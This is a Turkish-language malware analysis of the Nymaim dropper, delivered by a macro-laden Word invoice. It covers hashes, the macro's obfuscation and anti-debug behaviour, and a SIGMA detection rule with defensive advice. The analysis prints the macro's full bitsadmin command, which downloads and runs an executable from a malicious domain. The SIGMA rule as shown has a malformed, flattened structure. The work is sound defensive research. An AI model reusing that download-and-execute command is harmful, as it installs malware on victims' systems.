Nymaim ve Uygulanabilecek SIGMA Kuralları

Nymaim

Genel Bakış

Artan teknolojik gelişmelerle beraber zararlı yazılımlardaki karmaşıklıklarda artıyor. En son trend, asıl zararlı yazılımı, başka bir zararlı yazılımı kullanarak indirip çalıştırmaya çalışmak. Bu tür taşıyıcı zararlı yazılımlar dropper adını alıyor. Bu yazımızda analizini yapacağımız Nymaim zararlısı başka zararlı yazılımları taşıyan bir dropperdır. Nymaim malspam ile yayılıp, zararlı ofis dosyasındaki makronun çalışmasıyla tetikleniyor.

Özet

Bu analizde popülerliği eskisi kadar çok olmayan fakat çok etkili bir dropper olan Nymaim zararlısının nasıl kulanıldığı ve neler yaptığı anlatılıyor. Emotet malspam ile yayılıp, kurbanın bilgisayarına ofis dokümanı ile bulaşıyor. Kurbanın dokümanın içerisindeki makronun çalışmasına izin vermesiyle, bir dizi işlemi tetiklemesi bir oluyor. Makro kod tarafından indirilen Nymaim zararlısı dropper görevi görerek başka bir zararlının bilgisayara yüklenmesini sağlıyor. Aşağıdaki görselde bu zararlının genel çalışma prensibini görebilirsiniz.

Temel Bilgiler

Aşağıda verilen bilgiler nymaim.exe ve invoice.doc diye adlandırılmıştır.

Nymaim.exe
MD5	0660093f6652dfd4f43bbfbea4a10dfc
SHA-1	f029c517ee519db5a73e547351fdc5b4c0bc18fa
SHA-256	27f8f77c7d398f90f7c4ffaa347b64849ba814b2a2c66ccae340c68330a83640
SSDeep	12288:i4STmTjWwSL31+kkcb6NJP2/tp8k7t00oRZ/SnCVRA5IQ/hTzGw5T:LSTujWNLgkV8Y/tqk9E/pWxzt5T
Dosya türü	Win32 EXE
Dosya boyutu	698.5 KB

Invoice.doc
MD5	c8dc2b5b66ce53e87d1510514ec0279f
SHA-1	2993ca3dba7f83beb11a9a4e03d786d9d60029f7
SHA-256	067353ec9b301b78a986d5a6448f7c736d886101e1af139ce52722cdc168c764
SSDeep	1536:VV4gSRAt/wE1SVL+gwMY+sROpgLuaLLhsAkGpq/6urIg1pACnb0:VVPSOSEkNhp3yaULlLpcnsmnI
Dosya türü	MS Word Document
Dosya boyutu	93.5 KB

Analiz

Malspam ile yayılan Nymamim’in tetiklenmesi zararlı ofis dokümanının çalıştırılmasıyla başlıyor. Dokümanı açınca karşımıza aşağıdaki gibi bir ekran geliyor.

Dokümanda da yazdığı üzere makroların etkinleştirilmesi söyleniyor. Makroyu etkinleştirmeden önce içine bakalım. Makroyu çıkarmak için olevba komutunu kullanıyoruz. olevba.py -d Invoice.doc komutunu çalıştırarak makroyu çıkartıyoruz. Analizi zorlaştırmak için makroda bazı obfuscation teknikleri uygulanmış. İlk başta gözümüze çarpan, web programlama ile uğraşanların mock-up oluştururken çok fazla kullandığı Latince yer tutucu (placeholder) cümlelerin olduğunu görüyoruz.

  

Analize devam ettiğimizde matematiksel fonksiyonların çağrıldığını, hiçbir ilgisi olmayan bazı stringlerin kullanıldığını ve bunlarla işlemler yapıldığını görüyoruz. Aşağıdaki görselde makronun en sonunda çalışan Shell komutunu görüyoruz. Shell fonksiyonu Windows sistemlerde CMD üzerinden komut çalıştırmamıza olanak veriyor.

 

Aşağıdaki görselde Document_Open fonksiyonu verilmiştir. Bu fonksiyon makronun otomatik olarak dokümanın her açılışında çalışmasını sağlıyor. Gereksiz ve kullanılmayan stringler bu görselde de gözüküyor. 

 

Makronun en sonunda çalışan komut:

cmd.exe /c bitsadmin /transfer j1 http://fluxystemsinc.us/verty/495867493583kjdhdkj/786545435.png %TEMP%/1.exe &bitsadmin /create /download j2 &bitsadmin /addfile j2 http://fluxystemsinc.us/verty/495867493583kjdhdkj/index.php %TEMP%/1.txt &bitsadmin /setcustomheaders j2 User-Agent:Mozilla/4.0-GREAT &bitsadmin /resume j2 &bitsadmin /complete j2 && start %TEMP%/1.exe

Komutu özetlemek gerekirse, bitsadmin aracını kullanarak hxxp://fluxystemsinc.us/verty/495867493583kjdhdkj domain adresinden zararlı dosyayı indirerek 1.exe olarak kaydediyor. Komutu sonunda bulunan start %TEMP% 1.exe komutu ise indirilen zararlının çalıştırılması için kullanılıyor.

Çalıştırılan dosyayı biraz incelediğimizde bilinen packing (tersine mühendislik işlemini zorlaştıran işlem, dosyayı paketleyip içerisindeki gizlemek gibi düşünebiliriz.) işlemi uygulanmadığını görüyoruz.

Tersine mühendislik işlemini zorlaştırmak için kullanılan başka bir anti-analiz tekniği olan anti-debug amacıyla kullanılan fonksiyonların çağrıldığını görüyoruz.

 

Zararlımız anti-debug kontrollerini yaptıktan sonra asıl amacı olan başka dosyaları indirmek amacıyla iletişim kurmaya başlıyor. Bunun için DNS ve HTTP istekleri attığını görüyoruz. Burada dikkatimizi çeken IP adresinin değişmiş olmasına rağmen domain adının aynı olması.

İletişimi kurup gerekli dosyayı indirdikten sonra çalıştırıp işini sonlandırıyor. Bu analizi yaparken domainler kapalı olduğu için, indirilen dosyayı ve sonrasında olanları analiz edemedim.

Nymaim Tespiti için Uygulanabilecek SIGMA Kuralı

title: Nymaim
description: Detect Nymaim Malicious Activities
author: Burak ÇARIKÇI
references:
https://malware-traffic-analysis.net/2017/11/03/index2.html
https://www.virustotal.com/#/file/067353ec9b301b78a986d5a6448f7c736d886101e1af139ce52722cdc168c764/detection
date: 2019/03/08
status: testing
detection:
condition: 1 of them
logsource:
category: firewall
detection:
outgoing:
dst:
- 186.73.245.226
- 84.255.244.213
- 41.110.200.194
- 84.54.187.24
- 87.116.153.100
- 197.156.97.198
- 128.140.229.203
- 109.120.246.101
- 212.98.131.181
- 186.74.208.84
- 185.118.65.231
- efeionsrey.com
- swmsoyurof.com
- zepter.com
incoming:
src:
- 186.73.245.226
- 84.255.244.213
- 41.110.200.194
- 84.54.187.24
- 87.116.153.100
- 197.156.97.198
- 128.140.229.203
- 109.120.246.101
- 212.98.131.181
- 186.74.208.84
- 185.118.65.231
- efeionsrey.com
- swmsoyurof.com
- zepter.com
logsource:
product: windows
service: sysmon
detection:
selection1:
#Sysmon process creation
EventID: 1
ParentImage:
- '*\WINWORD.EXE'
Image:
- '*\cmd.exe'
- '*\powershell.exe'
- '*\WINWORD.exe'
selection2:
#Sysmon file creation
EventID: 11
TargetFilename:
- '*\Payment.doc'
- '*\Invoice*.doc'
- '*\Deposit.doc'
- '*\Fine.doc'
- '*\nymaim.exe'
fields:
- Image
- TargetFileName
- CommandLine
- ParentCommandLine
- EventID
- TargetObject
falsepositives:
- unknown
level: high

Öneriler

• Bilinçlenmek en büyük önlemlerden biridir. Gündemi takip edebilecek kadar bilgi çok şey değiştirebilir.
• Şirketiniz için güvenlik politikası oluşturabilirsiniz.
• Bilmediğiniz kaynaklardan gelen dosyaları açmayın. Nymaim zararlısının yayılırken kullandığı yöntem zararsız gözüken dokümanları yaymaktır.
  
• Güvenmediğiniz dosyaları çevrimiçi araçlarla (VirusTotal, hybrid-analysis vb.) kolayca analiz edip, ondan sonra çalıştırabilirsiniz.
• Güvenilir antivürs programları kullanabilirsiniz.
• Sadece güvendiğiniz ofis dokümanlarının makrolarını çalıştırınız.
• Kurumdaki bütün makroları Group Policy kullanarak kapatabilirsiniz^[5].
  
• Domain-Based Message Authentication, Reporting & Conformance (DMARC) sistemi kurularak kuruma gelen spam mailleri en aza indirebilirsiniz^[6].
  

Kaynakça

1. 2017-11-03 - MALSPAM PUSHING NYMAIM: https://malware-traffic-analysis.net/2017/11/03/index2.html
2. UKPC Parking Tickets Malspam scam delivers Nymaim trojan: https://myonlinesecurity.co.uk/ukpc-parking-tickets-malspam-scam-delivers-nymaim-trojan/
3. Çalıştırılabilir dosyanın VirusTotal sonucu: https://www.virustotal.com/#/file/27f8f77c7d398f90f7c4ffaa347b64849ba814b2a2c66ccae340c68330a83640/detection
4. Ofis dosyasının VirusTotal sonucu: https://www.virustotal.com/#/file/067353ec9b301b78a986d5a6448f7c736d886101e1af139ce52722cdc168c764/detection
5. Disable All Microsoft Office Macros Globally for All Users: https://superuser.com/questions/1073060/disable-all-microsoft-office-macros-globally-for-all-users/1073064#1073064
6. DMARC: https://en.wikipedia.org/wiki/DMARC